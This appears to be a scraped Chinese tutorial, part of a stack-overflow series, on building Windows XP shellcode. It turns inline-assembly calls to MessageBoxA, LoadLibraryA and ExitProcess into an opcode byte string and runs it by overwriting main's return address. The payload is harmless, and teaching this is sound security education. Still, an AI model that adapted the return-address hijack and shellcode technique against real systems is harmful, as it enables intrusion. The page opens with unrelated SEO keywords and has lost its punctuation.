青岛企业网站制作,怎么做58同城网站,网上购物英语作文,nike定制在哪个app经过1.1和1.2节的讲述#xff0c;我们已经知道了怎样更改EIP的值。程序运行函数之后将跳转到我们设定的位置開始运行#xff0c;因此#xff0c;我们须要准备一个自己的程序#xff0c;接手后面的工作。这是一个什么样的程序#xff1f;是一个C语言编写的代码#xff1f;… 经过1.1和1.2节的讲述我们已经知道了怎样更改EIP的值。程序运行函数之后将跳转到我们设定的位置開始运行因此我们须要准备一个自己的程序接手后面的工作。这是一个什么样的程序是一个C语言编写的代码是一个可直接调用的exe肯定不是由于EIP所指的地址保存的内容为指令的操作码CPU读取该操作码运行相应的操作。所以我们要准备的程序也应该是一段“操作码”。 继续写1.1中的Hello World。这次我们要把一个C语言编写的MessageBox换成一个仅仅有“操作码”的程序。要获取操作码非常easyImmunity Debugger中显示出了每句汇编语句相应的操作码 图19 上图就是调用MessageBoxA函数相应的汇编指令及操作码。 再正式写Shellcode之前我们先编写一个汇编形式的MessageBox。我们当然不是用MASM而是使用VC的内联汇编__asm这样就须要解决几个问题。 1内联汇编中无法定义字符串常量“example_1”和“HelloWorld”我们怎样定义它并获取其地址 我们无法用汇编语句中的db在内联汇编中定义字符串常量但有一个东西在我们的掌控之下——栈因此能够将字符串硬编码压入栈上。同一时候能够获取其地址。 2内联汇编中没有API函数MessageBoxA怎样调用它 没有了c语言之间调用的MessageBoxA但通过example_1在Immunity Debugger中的调试我们知道了MessageBoxA的地址见图5为0x77d507ea未启用地址随机化且不同机器不相同这个地址在我的Windows XP SP3下是固定的。因此我能够直接在汇编中调用该地址即可。 似乎没什么问题了写出来例如以下代码 /****************************************************************/
// example_3内联汇编
int main()
{__asm{push ebpmov ebp, esppush 0x0000646c // ldpush 0x726f576f // oWorpush 0x6c6c6548 // Hellpush 0x00000031 // 1push 0x5f656c70 // ple_push 0x6d617865 // exampush 0lea ebx, [ebp-18h]push ebxlea ebx, [ebp-0ch]push ebxpush 0mov ebx, 0x77d507eacall ebxadd esp, 18hpop ebp}return 0;
}
/********************************************************* */ 是的不用头文件也没有C函数main除外。编译运行它。然后炸了。。。 图20 0x77d507ea訪问错误这不是MessageBoxA函数函数吗难道是我的地址找错了用Immunity Debugger看看。 图21 这是main函数能够看到中间我们用内联汇编写的代码基本保持原样。我们在CALL EBX上设断点能够看到两个字符串及MessageBoxA的參数都已经被成功放入栈中 图22 接着单步运行F7发现CALL EBX跳转后没有不论什么指令接着调试器给出了例如以下错误 图23 查看以下内存空间大概就能够发现问题了 图24 是的并没有0x77d507ea这个地址范围也没有MessageBoxA所在的user32.dll。也就是说程序根本没有载入user32.dll。这就是直接使用地址和通过API调用的区别。编译器不会检查0x77d507ea这个函数是否存在。 我们用简单的方法来验证这个猜想。用LoadLibrary载入user32.dll /****************************************************************/#include Windows.hint main()
{LoadLibraryA(user32.dll);
...
/****************************************************************/ 好了。运行成功 图25 但这不是我们想要的我们不想要头文件也不想要API调用。所以我们要再改一下把LoadLibraryA也写入汇编中。LoadLibraryA位于kernel32.dll中这个动态库是肯定会载入的。因此。找到LoadLibraryA的地址即可了在我的机器上为0x7c801d7b。程序改为这样 /*****************************************************************************/
// example_3内联汇编
int main()
{__asm{push ebpmov ebp, esppush 0x0000646c // ldpush 0x726f576f // oWorpush 0x6c6c6548 // Hellpush 0x00000031 // 1push 0x5f656c70 // ple_push 0x6d617865 // exampush 0x00006c6c // llpush 0x642e3233 // 32.dpush 0x72657375 // userlea ebx, [ebp-24h]push ebxmov ebx, 0x7c801d7b call ebx // LoadLibraryApush 0lea ebx, [ebp-18h]push ebxlea ebx, [ebp-0ch]push ebxpush 0mov ebx, 0x77d507ea // MessageBoxAcall ebxadd esp, 24hpop ebp}return 0;
}
/*****************************************************************************/ 编译后运行成功。这样我们把这段汇编代码的操作码抠出来运行也应该能够达到相同的效果。先把操作码抠出来吧 /*****************************************************************************/
55 // PUSH EBP
8BEC // MOV EBP, ESP
68 6C640000 //PUSH 646C
68 6F576F72 //PUSH 726F576F
68 48656C6C //PUSH 6C6C6548
6A 31 //PUSH 31
68 706C655F //PUSH 5F656C70
68 6578616D //PUSH 6D617865
68 6C6C0000 //PUSH 6C6C
68 33322E64 //PUSH 642E3233
68 75736572 //PUSH 72657375
8D5D DC //LEA EBX,DWORD PTR SS:[EBP-24]
53 //PUSH EBX
BB 7B1D807C //MOV EBX,kernel32.LoadLibraryA
FFD3 //CALL EBX
6A 00 //PUSH 0
8D5D E8 //LEA EBX,DWORD PTR SS:[EBP-18]
53 //PUSH EBX
8D5D F4 //LEA EBX,DWORD PTR SS:[EBP-C]
53 //PUSH EBX
6A 00 //PUSH 0
BB EA07D577 //MOV EBX,77D507EA
FFD3 //CALL EBX
/*****************************************************************************/ 去掉了尾部几句恢复EBP。ESP的语句。我们不再须要它。后面你将知道可是首部的不能去掉由于要用它寻址字符串整理一下操作码 /*****************************************************************************/
char opcode[] \x55\x8B\xEC\x68\x6C\x64\x00\x00\x68\x6F\x57\x6F\x72\x68\x48\x65\x6C\x6C\x6A\x31\x68\x70\x6C\x65\x5F
\x68\x65\x78\x61\x6D\x68\x6C\x6C\x00\x00\x68\x33\x32\x2E\x64\x68\x75\x73\x65\x72\x8D\x5D\xDC\x53\xBB\x7B
\x1D\x80\x7C\xFF\xD3\x6A\x00\x8D\x5D\xE8\x53\x8D\x5D\xF4\x53\x6A\x00\xBB\xEA\x07\xD5\x77\xFF\xD3; /*****************************************************************************/ 以下是測试程序 /*****************************************************************************/
char opcode[] \x55\x8B\xEC\x68\x6C\x64\x00\x00\x68\x6F\x57\x6F\x72\x68\x48\x65\x6C\x6C\x6A\x31\x68\x70\x6C\x65\x5F
\x68\x65\x78\x61\x6D\x68\x6C\x6C\x00\x00\x68\x33\x32\x2E\x64\x68\x75\x73\x65\x72\x8D\x5D\xDC\x53\xBB\x7B
\x1D\x80\x7C\xFF\xD3\x6A\x00\x8D\x5D\xE8\x53\x8D\x5D\xF4\x53\x6A\x00\xBB\xEA\x07\xD5\x77\xFF\xD3; int main()
{int* ret;ret (int*)ret 2;(*ret) (int)opcode;
}
/*****************************************************************************/ 測试程序中直接用opcode的地址覆盖了main函数的返回地址。程序运行效果例如以下 图26 MessageBoxA成功运行可是随后程序崩溃这是正确的。由于我们覆盖了main的返回地址。opcode接管程序后无法再返回main中程序跑飞了无法正常结束。我们须要在opcode中结束它。须要再加一个ExitProcess调用相同。我找到了它在我机器上的地址0x7c81cafa。 将example_3中的最后两句add esp, 24h, pop ebp 换为例如以下 /*****************************************************************************/
xor eax, eax
push eax
mov ebx, 0x7c81cafa // ExitProcess
call ebx
/*****************************************************************************/ 最后得到以下这个正常工作并退出的Shellcode /*****************************************************************************/
// example_4MessageBox的Shellcode版本号
char opcode[] \x55\x8B\xEC\x68\x6C\x64\x00\x00\x68\x6F\x57\x6F\x72\x68\x48\x65\x6C\x6C\x6A\x31\x68\x70\x6C\x65\x5F
\x68\x65\x78\x61\x6D\x68\x6C\x6C\x00\x00\x68\x33\x32\x2E\x64\x68\x75\x73\x65\x72\x8D\x5D\xDC\x53\xBB\x7B
\x1D\x80\x7C\xFF\xD3\x6A\x00\x8D\x5D\xE8\x53\x8D\x5D\xF4\x53\x6A\x00\xBB\xEA\x07\xD5\x77\xFF\xD3\x33\xC0
\x50\xBB\xFA\xCA\x81\x7C\xFF\xD3; int main()
{int* ret;ret (int*)ret 2;(*ret) (int)opcode;
}
/*****************************************************************************/
